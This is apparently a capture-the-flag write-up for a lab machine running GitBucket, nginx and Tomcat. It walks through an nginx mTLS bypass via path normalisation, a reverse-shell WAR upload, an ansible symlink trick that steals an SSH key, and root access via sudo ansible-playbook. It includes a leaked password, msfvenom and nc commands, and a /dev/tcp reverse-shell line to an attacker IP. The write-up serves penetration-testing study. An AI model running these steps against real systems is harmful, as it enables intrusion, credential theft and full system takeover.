There is an Nginx instance running on the remote machine, most likely as a reverse proxy, and behind it there should be an upstream web server such as Apache or Tomcat
If that is the case, we should be aware that the two web servers may interpret and normalise routes differently
If we take a look at the website from the browser, we see that it is running GitBucket as the Web Application
There is a login form and we can do nothing until we log into the application
Since we do not have a valid account, we will create a new one with the following data
Once logged in, we can browse the repositories section. And we have the following →
Two repositories and some activity related to both repositories and two users → Luis and Alex
Inspecting both repositories, the one called Infra does not have much
However, there are a bunch of interesting things in the commits section of the seal_market repository
If we browse the repository files corresponding to the commit made by Luis, whose comment is Updating tomcat configuration, we can see the content of the tomcat-users.xml file inside the tomcat directory
Note that this file usually contains some type of credentials related to the /manager/html panel or something similar
In this case we have the credentials of the user tomcat who has manager-gui and admin-gui roles
User → tomcat
Password → 42MrHBf*z8{Z%
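For reference, the relevant entry in tomcat-users.xml looks something like this (a reconstruction from the roles and credentials above, not copied verbatim from the commit):

```xml
<tomcat-users>
  <!-- user with access to the manager and host-manager web interfaces -->
  <user username="tomcat" password="42MrHBf*z8{Z%" roles="manager-gui,admin-gui"/>
</tomcat-users>
```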
However, remember that we cannot reach /manager/html to test the above credentials, due to the 403 Forbidden error
If we keep inspecting the commits section and the corresponding files on those timelines, we come across nginx’s default configuration file in the Updating nginx configuration commit
server {
    ...
    root /var/www/html;
    ssl_protocols TLSv1.1 TLSv1.2;
    ssl_verify_client optional;
    ...
}
We see the ssl_verify_client directive, which enables mTLS (Mutual TLS)
Notice that, in a regular TLS connection, the server presents its TLS certificate to the client, and the client validates it by checking that everything is correct
But, in mTLS, both parties validate each other's certificates. Therefore, the client must also present its TLS certificate to the server
The certificate presented by the client must be issued by a CA trusted by the server; in this case, the same CA that issued the server certificate
In this case, the value of this directive is optional instead of on. This allows validation to be handled in other configuration blocks, such as the location blocks
If the value of the directive were on, any client presenting an invalid certificate would be rejected by Nginx with a 400 Bad Request
Since the ssl_verify_client directive is set to optional, if verification of the client’s certificate fails, the web server will not respond directly with a 400 Bad Request; instead, the validation is handled in the corresponding location block, depending on the path of the requested resource
Then, if the verification fails, nginx will respond with a 403 Forbidden
That’s why we get a 403 Forbidden when trying to access resources such as /manager/html or /admin/dashboard: we enter the corresponding location block
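To illustrate, a location block implementing this per-path check could look like the following (a sketch of the behaviour described, not the exact block from the commit; the backend address is an assumption):

```nginx
location /manager/html {
    # ssl_verify_client is optional, so the handshake succeeds even without a
    # valid client certificate; the verification result is checked here instead
    if ($ssl_client_verify != SUCCESS) {
        return 403;
    }
    proxy_pass http://localhost:8080;  # forward verified clients to Tomcat
}
```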
Any requested resource whose URI does not match the three location blocks above will fall through to the location / block and be passed directly to the backend web server, in this case Tomcat, via the proxy_pass directive
This is where the concept set out above comes into play
We said that, in a web server architecture where an nginx runs as a reverse proxy, receiving all requests, and a backend web server, such as Apache or Tomcat, handles the requested dynamic content, the way the two servers parse and normalise URLs may differ
Applied to /manager/html, we know that if we request this resource, the request will fall into the location /manager/html block and we will receive a 403 Forbidden, as the mTLS validation will fail
We can address this situation in two ways →
Assuming that the CA that issued the server certificate is installed on the same machine (bad practice!! 😅), if an LFI vulnerability is disclosed in any web application on the server, an attacker could try to point it at the path of the CA’s private key, extract its content and craft, on their side, a valid client certificate to present to the web server and pass the mTLS validation (see the openssl sketch after this list)
Or, in this case, we could investigate whether nginx and tomcat differ in URL normalisation. We could then request a resource that resolves to /manager/html but does not match the path specified in the location /manager/html block, so the request falls into location / and is passed to Tomcat, which may interpret the requested URL as /manager/html
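For completeness, if the CA’s key and certificate were recovered via such an LFI, a valid client certificate could be minted along these lines (all file names here are hypothetical):

```bash
# Generate a client key and a CSR, then sign the CSR with the stolen CA
openssl req -new -newkey rsa:2048 -nodes -keyout client.key -out client.csr -subj '/CN=client'
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out client.crt -days 365

# Present the certificate to pass the mTLS check
curl -k --cert client.crt --key client.key 'https://10.129.95.190/manager/html'
```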
Nginx mTLS Bypass (Path Normalization) leads to RCE in Tomcat’s Manager via .WAR file deployment
So, according to the above resources and the following image →
Since nginx and tomcat parse URLs differently, we can manipulate the requested path by adding sequences such as ..; or a URL path parameter like /;name=orange/, so that it no longer matches the /manager/html location block
https://domain.tld/manager;param=value/html
As mentioned, the /manager;param=value/html path will not match the /manager/html location block defined in nginx, so the request will fall into the location / block, which passes it to Tomcat
Tomcat will then parse the requested path as /manager/html, bypassing the mTLS validation by avoiding entering the location blocks containing the validation
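We can check the difference quickly with curl (the status codes shown in the comments are what we would expect under this setup):

```bash
# The plain path matches the location /manager/html block → mTLS check → 403
curl -k -s -o /dev/null -w '%{http_code}\n' 'https://10.129.95.190/manager/html'

# The path-parameter variant falls through to location / and reaches Tomcat → 401
curl -k -s -o /dev/null -w '%{http_code}\n' 'https://10.129.95.190/manager;param=value/html'
```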
Therefore, we request the following url →
https://10.129.95.190/manager;param=value/html
And we are asked for credentials to access the tomcat manager interface
Once we’re in, we have several ways to get Remote Code Execution and access the remote machine by establishing a reverse connection
We can upload a WAR file containing a .JSP file that, once the WAR is deployed, makes a reverse connection to the socket (IP address:port) specified inside it
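One common way to build such a WAR is with msfvenom (the listener port 4444 is an arbitrary choice; IP and paths are examples):

```bash
# Generate a WAR whose embedded JSP connects back to the attacker
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.37 LPORT=4444 -f war -o shell.war

# Catch the shell on the attacker side
nc -lvnp 4444

# After deploying shell.war through the manager, trigger the JSP via the same
# path-parameter bypass, e.g.:
curl -k 'https://10.129.95.190/shell;param=value/'
```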
401603     4 -rw-r--r-- 1 luis luis      220 May  5  2021 /home/luis/.bash_logout
401604     4 -rw-r--r-- 1 luis luis     3797 May  5  2021 /home/luis/.bashrc
539053     4 -rw-rw-r-- 1 luis luis      118 May  5  2021 /home/luis/.config/jgit/config
401605     4 -rw-r--r-- 1 luis luis      807 May  5  2021 /home/luis/.profile
401811 51268 -rw-r--r-- 1 luis luis 52497951 Jan 14  2021 /home/luis/gitbucket.war
We could search for some juicy information within the .bashrc file, such as aliases or check for leaked credentials in the config file inside the jgit directory
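A quick way to eyeball both (paths taken from the listing above; the grep pattern is just a heuristic):

```bash
# Look for aliases or anything credential-like in the shell config
grep -iE 'alias|pass|secret|token' /home/luis/.bashrc

# And dump the jgit configuration
cat /home/luis/.config/jgit/config
```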
But there is nothing interesting in these files
Looking for software installed on the remote machine under the /opt directory, we find the following content
find /opt -readable -ls 2> /dev/null
Command Output
64913   4 drwxr-xr-x 3 root root   4096 May  7  2021 /opt
85231   4 drwxr-xr-x 4 luis luis   4096 Apr 10 14:27 /opt/backups
85233   4 drwxrwxr-x 2 luis luis   4096 Apr 10 14:27 /opt/backups/archives
  627 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:25 /opt/backups/archives/backup-2025-04-10-14:25:33.gz
 1731 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:27 /opt/backups/archives/backup-2025-04-10-14:27:32.gz
 1371 592 -rw-rw-r-- 1 luis luis 606047 Apr 10 14:26 /opt/backups/archives/backup-2025-04-10-14:26:32.gz
85232   4 drwxrwxr-x 2 luis luis   4096 May  7  2021 /opt/backups/playbook
64967   4 -rw-rw-r-- 1 luis luis    403 May  7  2021 /opt/backups/playbook/run.yml
The /opt/backups/playbook directory seems interesting
It contains an ansible playbook with the following content →
This ansible playbook has three different defined tasks
Copy Files → Uses the Synchronize module to copy the content from a certain system location to another
Server Backups → Compresses the specified directory or file by leveraging the Archive module
Clean → Removes a specific directory using the absent state of the File module
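Putting the three tasks together, run.yml plausibly looks something like this (a reconstruction from the descriptions above and the paths mentioned below; the exact syntax may differ, and the archive naming pattern is inferred from the file names in /opt/backups/archives):

```yaml
- hosts: localhost
  tasks:
    - name: Copy Files
      synchronize:
        src: /var/lib/tomcat9/webapps/ROOT/admin/dashboard
        dest: /opt/backups/files
        copy_links: yes   # follows symlinks and copies the target file

    - name: Server Backups
      archive:
        path: /opt/backups/files/
        dest: "/opt/backups/archives/backup-{{ ansible_date_time.date }}-{{ ansible_date_time.time }}.gz"

    - name: Clean
      file:
        state: absent
        path: /opt/backups/files/
```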
However, there is one thing about the Copy Files task that strikes me: it uses the ansible synchronize module to perform the copy operation
But, the copy_links option is set to yes, which means that it copies the actual file that the symlink points to instead of copying the symlink itself
This makes it vulnerable to local privilege escalation if another user runs the ansible-playbook binary against this playbook via a cron job, or if the current user has a sudoers entry allowing them to run it as another user
The source of the sync task is /var/lib/tomcat9/webapps/ROOT/admin/dashboard
If we had write permissions on this directory, we could create a symbolic link pointing to a sensitive file
If another user runs this ansible playbook, we might be able to read arbitrary files from that user
Since the copy_links parameter is enabled, we can create a symlink inside the writable folder pointing to a sensitive file owned by the user running the playbook, and the sync task will copy the actual file pointed to by the symlink instead of the symlink itself, as explained above
ls -l /var/lib/tomcat9/webapps/ROOT/admin/dashboard | grep -i -- uploads
Command Output
drwxrwxrwx 2 root root 4096 May 7 2021 uploads
And the uploads directory is world-writable, so we can create any file within it
We have already checked that the current user does not have any sudoers privilege
We can now list the processes that run at regular time intervals to check if a certain user, such as luis, runs this ansible-playbook
To achieve this task, just transfer a pspy binary to the remote machine
From the Attacker
Download the pspy binary
curl --silent --location --request GET 'https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64' --output pspy64
Start a Simple HTTP Server
python3 -m http.server 80
From the Target
Transfer the pspy binary and execute it
wget 'http://10.10.16.37/pspy64' -O /dev/shm/pspy
chmod 777 !$
/dev/shm/pspy
And if we wait a little bit, we get the following results →
sudo -u luis /usr/bin/ansible-playbook /opt/backups/playbook/run.yml
And we see that root is executing the above command as the user luis
That command runs the analyzed ansible playbook
Therefore, since we have write permissions on the uploads directory, as mentioned, we could create a symlink pointing to a sensitive file owned by luis
This file could be, if it exists, /home/luis/.ssh/id_rsa
Thus, we could connect to the remote machine via SSH as luis
Note that the destination path of the sync task is /opt/backups/files
If we list the contents of the /opt/backups directory, there is no files directory
Remember that all the tasks defined in the ansible playbook are executed one after another within a single run, so the files directory only exists briefly
So, after the sync task is executed, the archive task compresses the content of the /opt/backups/files directory and stores the generated compressed file in the /opt/backups/archives directory
Subsequently, the clean task deletes the /opt/backups/files directory, which means that we have to extract the copied file from the compressed backup stored in the /opt/backups/archives directory
Therefore, proceed as follows →
From the Target
Create a symlink in /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads pointing to /home/luis/.ssh/id_rsa
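A sketch of the full sequence, assuming the Archive module produces a gzipped tar and the playbook runs roughly every minute, as the archive timestamps suggest (file names other than the paths already shown are placeholders):

```bash
# 1. Plant the symlink in the world-writable uploads directory
ln -s /home/luis/.ssh/id_rsa \
   /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/id_rsa

# 2. After the next run, copy out the newest archive and unpack it
cp "$(ls -t /opt/backups/archives/backup-* | head -n 1)" /tmp/backup.gz
cd /tmp && tar -xzf backup.gz

# 3. The key should sit under the synced dashboard tree (path assumed from
#    the sync source); fix its permissions and log in as luis
chmod 600 dashboard/uploads/id_rsa
ssh -i dashboard/uploads/id_rsa luis@localhost
```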
And we are in as luis! Grab the user.txt flag and continue 😊
cat ~/user.txt
Privesc #2 (If exists)
Non-Privileged User → Luis
Sudo Privileges (Ansible-Playbook)
As we did before, first check which groups the current user belongs to
id
Command Output
uid=1000(luis) gid=1000(luis) groups=1000(luis)
But the user does not belong to any interesting group
Next, we check the sudoers privileges assigned to luis
sudo -l
Command Output
Matching Defaults entries for luis on seal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User luis may run the following commands on seal:
    (ALL) NOPASSWD: /usr/bin/ansible-playbook *
So the user luis can run the binary /usr/bin/ansible-playbook as any user on the system, without providing a password, with any playbook passed as an argument
From the Attacker
So, we could create an ansible playbook containing a task that runs a system command like bash -c 'bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1'
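A minimal sketch of such a playbook (privesc.yml is a hypothetical name; the socket matches the attacker IP used earlier and an arbitrary port, so adjust both to your listener):

```yaml
# privesc.yml — spawns a reverse shell as whichever user runs the playbook
- hosts: localhost
  tasks:
    - name: revshell
      shell: "bash -c 'bash -i >& /dev/tcp/10.10.16.37/4444 0>&1'"
```

Then start a listener on the attacker (nc -lvnp 4444) and run the playbook through sudo on the target to get the shell as root:

sudo /usr/bin/ansible-playbook privesc.yml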